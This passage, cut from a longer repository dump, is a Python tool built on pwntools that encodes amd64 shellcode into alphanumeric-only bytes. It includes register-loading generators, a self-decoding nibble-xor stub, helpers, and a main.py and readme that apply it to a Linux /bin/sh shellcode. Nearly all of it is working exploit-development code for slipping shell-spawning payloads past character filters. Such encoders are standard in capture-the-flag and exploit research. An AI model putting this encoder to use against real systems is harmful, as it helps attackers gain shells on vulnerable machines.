        text += "xor [rcx+0x30], rax\n"
        text += "xor rax, [rcx+0x30]\n"

        return text
333 | 
334 | 
# set 64bit data to rax with shortest length
class AutoNumGen(Shellcode):
    """Load ``data`` into rax, choosing a generator by magnitude.

    * ``0``              -> ``Zero``
    * ``1 .. 0x7f``      -> push/pop when the value is in
      ``util.alphanum_pool``, otherwise ``XorReg``
    * ``0x80 .. 0xffff`` -> ``FastNumGen``
    * ``>= 0x10000``     -> ``NumGen``
    * negative           -> the bitwise complement is generated and xored
      with an all-ones value kept in r15
    """

    # Class-wide flag: True once the code loading r15 with all ones has been
    # emitted.  It is shared by every instance and never cleared here.
    neg_init = False

    def __init__(self, data: int):
        assert -0x7fffffffffffffff <= data < 0x10000000000000000
        self.number = data

    @cached_property
    def code(self):
        shellcode = ''
        if self.number == 0:
            shellcode += Zero("rax")
        elif 0 < self.number < 0x80:
            if self.number in util.alphanum_pool:
                shellcode += """
push {num:#x}
pop rax
""".format(num=self.number)
            else:
                xor1, xor2 = XorReg.find_xor(self.number)
                shellcode += XorReg(xor1=xor1, xor2=xor2)
        elif 0x80 <= self.number <= 0xffff:
            shellcode += FastNumGen(self.number)
        elif self.number >= 0x10000:
            shellcode += NumGen(self.number)
        elif self.number < 0:
            if not AutoNumGen.neg_init:
                shellcode += NumGen(0xffffffffffffffff)
                shellcode += Mov(src="rax", dst="r15")
                AutoNumGen.neg_init = True
            # Complement of the two's-complement encoding of the number.
            num = 0xffffffffffffffff ^ (0x10000000000000000 + self.number)
            # Choose by the size of the value actually generated.  The old
            # test on self.number was always true in this branch and sent
            # values wider than 16 bits to FastNumGen.
            if num <= 0xffff:
                shellcode += FastNumGen(num)
            else:
                shellcode += NumGen(num)

            # rdx = r15, moved through the scratch slot at [rsp+0x30], then
            # rax ^= all ones to obtain the requested negative value.
            shellcode += '''
push rsp
pop rcx
push r15
pop rdx
'''
            shellcode += '''
xor rdx, [rcx+0x30]
xor [rcx+0x30], rdx
xor rax, [rcx+0x30]
'''
        return shellcode
384 | 
385 | 
class Padding(Shellcode):
    """Filler built from ``push rax`` / ``pop rax`` instruction pairs.

    ``size`` counts instructions: ``size // 2`` full pairs are emitted, plus a
    lone ``push rax`` when ``size`` is odd.
    """

    padding = '''
push rax
pop rax
'''

    def __init__(self, size):
        self.size = size

    @cached_property
    def code(self):
        pair_count, leftover = divmod(self.size, 2)
        filler = self.padding * pair_count
        if leftover == 1:
            filler += "push rax\n"
        return filler
402 | 
403 | 
class ShellCodeXor(Shellcode):
    """Decoder stub plus the matching encoder for the nibble-xor payload format.

    ``code`` is the assembly text of the decoder loop; ``code_length`` is the
    value loaded into rcx, which ``loop xor_loop`` uses as its iteration count.
    ``shellcode_xor`` produces the data that is expected to follow the ``data:``
    label.
    """

    def __init__(self, code_length):
        self.code_length = code_length

    @cached_property
    def code(self):
        # Load the iteration count into rax, then move it to rcx.
        counter_setup = str(AutoNumGen(self.code_length)) + '''
    push rax
    pop rcx
    '''

        # Per iteration the loop pops one qword, multiplies it by 16 (a shift
        # by one nibble), xors it with the following qword and pushes the
        # result through the pointer kept in [r9+0x30].
        decoder_loop = '''
    / save rsp t0 r9
    push rsp
    pop r9
    
    push 0x30
    pop rax
    xor al, 0x30
    xor rax, [r9+0x30]
    xor [r9+0x30], rax
    lea rsp, [rip + data + 8]
    xor [r9+0x30], rsp  # we save rsp addr to [r9+0x30]
    
xor_loop:
    pop rax
    imul rax, rax, 16
    
    / clean rsi
    push rsi
    push rsp
    pop rdx
    xor rsi, [rdx]
    pop r8
    
    / mov rsi, rax
    push rax
    xor rsi, [rdx]
    pop r8
    
    / mov rsp, rdx
    push rsp
    pop rdx
    
    xor rsi, [rdx]
    pop rax
    
    / xarg rsp, [r9+0x30]
    xor rsp, [r9+0x30]
    xor [r9+0x30], rsp
    xor rsp, [r9+0x30]
    
    / save data to [r9+0x30] 
    push rsi
    pop rax
    pop rax
    
    / xarg rsp, [r9+0x30]
    xor rsp, [r9+0x30]
    xor [r9+0x30], rsp
    xor rsp, [r9+0x30]
    
    loop xor_loop
    
data:
'''
        return counter_setup + decoder_loop

    @staticmethod
    def shellcode_xor(shellcode: bytes):
        """Encode ``shellcode`` into alphanumeric bytes for the decoder loop.

        The payload is prefixed with the assembled ``mov rsp, r9`` and followed
        by eight 0x90 bytes, then split into whole 8-byte chunks; a trailing
        partial chunk is dropped. The result starts with eight ``b"a"`` bytes
        and carries 16 encoded bytes per chunk.
        """
        payload = util.asm("mov rsp, r9") + shellcode + b"\x90" * 8
        whole_bytes = len(payload) // 8 * 8
        encoded = b"a" * 8
        for start in range(0, whole_bytes, 8):
            first, second = ShellCodeXor.shift_xor(payload[start:start + 8])
            encoded += first + second
        return encoded

    @staticmethod
    def shift_xor(data: bytes):
        """Split 8 bytes into two 8-byte words made only of pool characters.

        For every input byte two pool characters are chosen by their low
        nibble: one for the byte's low nibble (xored with the high nibble of
        the previous "high" character, 0 for the first byte) and one for the
        byte's high nibble (xored with the high nibble of the first character).

        Returns a ``(high_word, low_word)`` tuple of ``bytes``.
        """
        assert len(data) == 8

        def pool_byte_for(nibble):
            # First pool character, in pool order, whose low nibble matches.
            return next(c for c in util.alphanum_pool if c & 0xf == nibble)

        low_word = bytearray()
        high_word = bytearray()
        carry = 0
        for byte in data:
            low_char = pool_byte_for((byte ^ carry) & 0xf)
            high_char = pool_byte_for((byte ^ low_char) >> 4)
            low_word.append(low_char)
            high_word.append(high_char)
            # This character's high nibble is folded into the next byte.
            carry = high_char >> 4

        return bytes(high_word), bytes(low_word)
506 | 


--------------------------------------------------------------------------------
/encoder/util.py:
--------------------------------------------------------------------------------
 1 | import pwn
 2 | import itertools
 3 | from pwn import asm
 4 | import functools
 5 | import struct
 6 | 
 7 | alphanum_pool = b"UVWXYZABCDEFGHIJKLMNOPQRSTabcdefghijklmnopqrstuvwxyz0123456789"
 8 | pwn.context.arch = "amd64"
 9 | 
10 | xor_table = [0] * 0x80
11 | for i in itertools.product(alphanum_pool, repeat=2):
12 |     n = i[0] ^ i[1]
13 |     xor_table[n] = i
14 | xor_table = xor_table
15 | 
16 | 
def num_size(num: int):
    """Return the smallest width in bytes (1, 2, 4 or 8) that can hold ``num``.

    ``num`` must be non-negative (checked with an assert). Raises ``Exception``
    when ``num`` does not fit in 64 bits.
    """
    assert num >= 0
    for width in (1, 2, 4, 8):
        if num <= (1 << (8 * width)) - 1:
            return width
    raise Exception("size out of range")
29 | 
30 | 
def is_alphanumeric(num: int, size: int):
    """Return True when ``num`` is exactly ``size`` bytes, all from the pool.

    The low ``size`` bytes of ``num`` must each be in ``alphanum_pool`` and no
    bits may remain above them.
    """
    if any(
        (num >> (8 * pos)) & 0xff not in alphanum_pool for pos in range(size)
    ):
        return False
    # A non-positive size inspects no bytes, so num itself must then be zero.
    return num >> (8 * max(size, 0)) == 0
37 | 
38 | 
def mul_iter():
    """Yield candidate factor pairs built from alphanumeric bytes.

    Pairs are produced in three stages of increasing size:
      1. one byte * one byte
      2. two byte * one byte
      3. two byte * two byte
    A two-byte value is ``(first << 8) + second`` for two pool bytes.
    """
    # 1. try one byte * one byte
    yield from itertools.combinations_with_replacement(alphanum_pool, 2)

    # Materialise the two-byte values. A lazy ``map`` would be exhausted by
    # stage 2 (``itertools.product`` consumes its inputs up front), leaving
    # stage 3 with nothing to iterate.
    numbers = [
        (first << 8) + second
        for first, second in itertools.product(alphanum_pool, repeat=2)
    ]

    # 2. try two byte * one byte
    yield from itertools.product(numbers, alphanum_pool)

    # 3. try two byte * two byte
    yield from itertools.combinations_with_replacement(numbers, 2)
52 | 
53 | 
def pack(data: int, fmt):
    """Pack the single value ``data`` into bytes using struct format ``fmt``."""
    packer = struct.Struct(fmt)
    return packer.pack(data)
56 | 
57 | 
def unpack(data: bytes, fmt):
    """Unpack ``data`` with struct format ``fmt`` and return the first field."""
    fields = struct.unpack(fmt, data)
    return fields[0]
60 | 
61 | 
# Little-endian packers for unsigned 8/16/32/64-bit integers.
p8, p16, p32, p64 = (
    functools.partial(pack, fmt=code) for code in ("<B", "<H", "<I", "<Q")
)

# Matching little-endian unpackers; each returns the decoded integer.
u8, u16, u32, u64 = (
    functools.partial(unpack, fmt=code) for code in ("<B", "<H", "<I", "<Q")
)
71 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | import pwn
 2 | from encoder import encode
 3 | 
 4 | pwn.context.arch = "amd64"
 5 | alphanum_pool = b"UVWXYZABCDEFGHIJKLMNOPQRSTabcdefghijklmnopqrstuvwxyz0123456789"
 6 | 
 7 | if __name__ == "__main__":
 8 |     sh = pwn.asm(pwn.shellcraft.amd64.linux.sh())
 9 |     e = encode(shellcode=sh, base_reg="rax", offset=0)
10 |     print(e)
11 |     print(pwn.hexdump(e))
12 |     print(pwn.disasm(e))
13 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | Encode an amd64 shellcode into an alphanumeric shellcode.
 2 | 
 3 | # usage
 4 | ```python
 5 | if __name__ == '__main__':
 6 |     sh = pwn.asm(pwn.shellcraft.amd64.linux.sh())
 7 |     print(encode(sh, base_reg = "rax", offset = 0))
 8 | ```
 9 | 
10 | 1. `base_reg` is the register that points to the shellcode.
11 | 
12 | 2. `offset` is the offset between `base_reg` and the start of the shellcode.
13 |  
14 | 3. `offset` can be negative or any other number, but a very large value will increase the length of the encoded shellcode.
15 | 
16 | 4. To use this encoder, `rsp` must point to the stack or to other readable/writable memory that does not overlap the shellcode itself.
17 | 


--------------------------------------------------------------------------------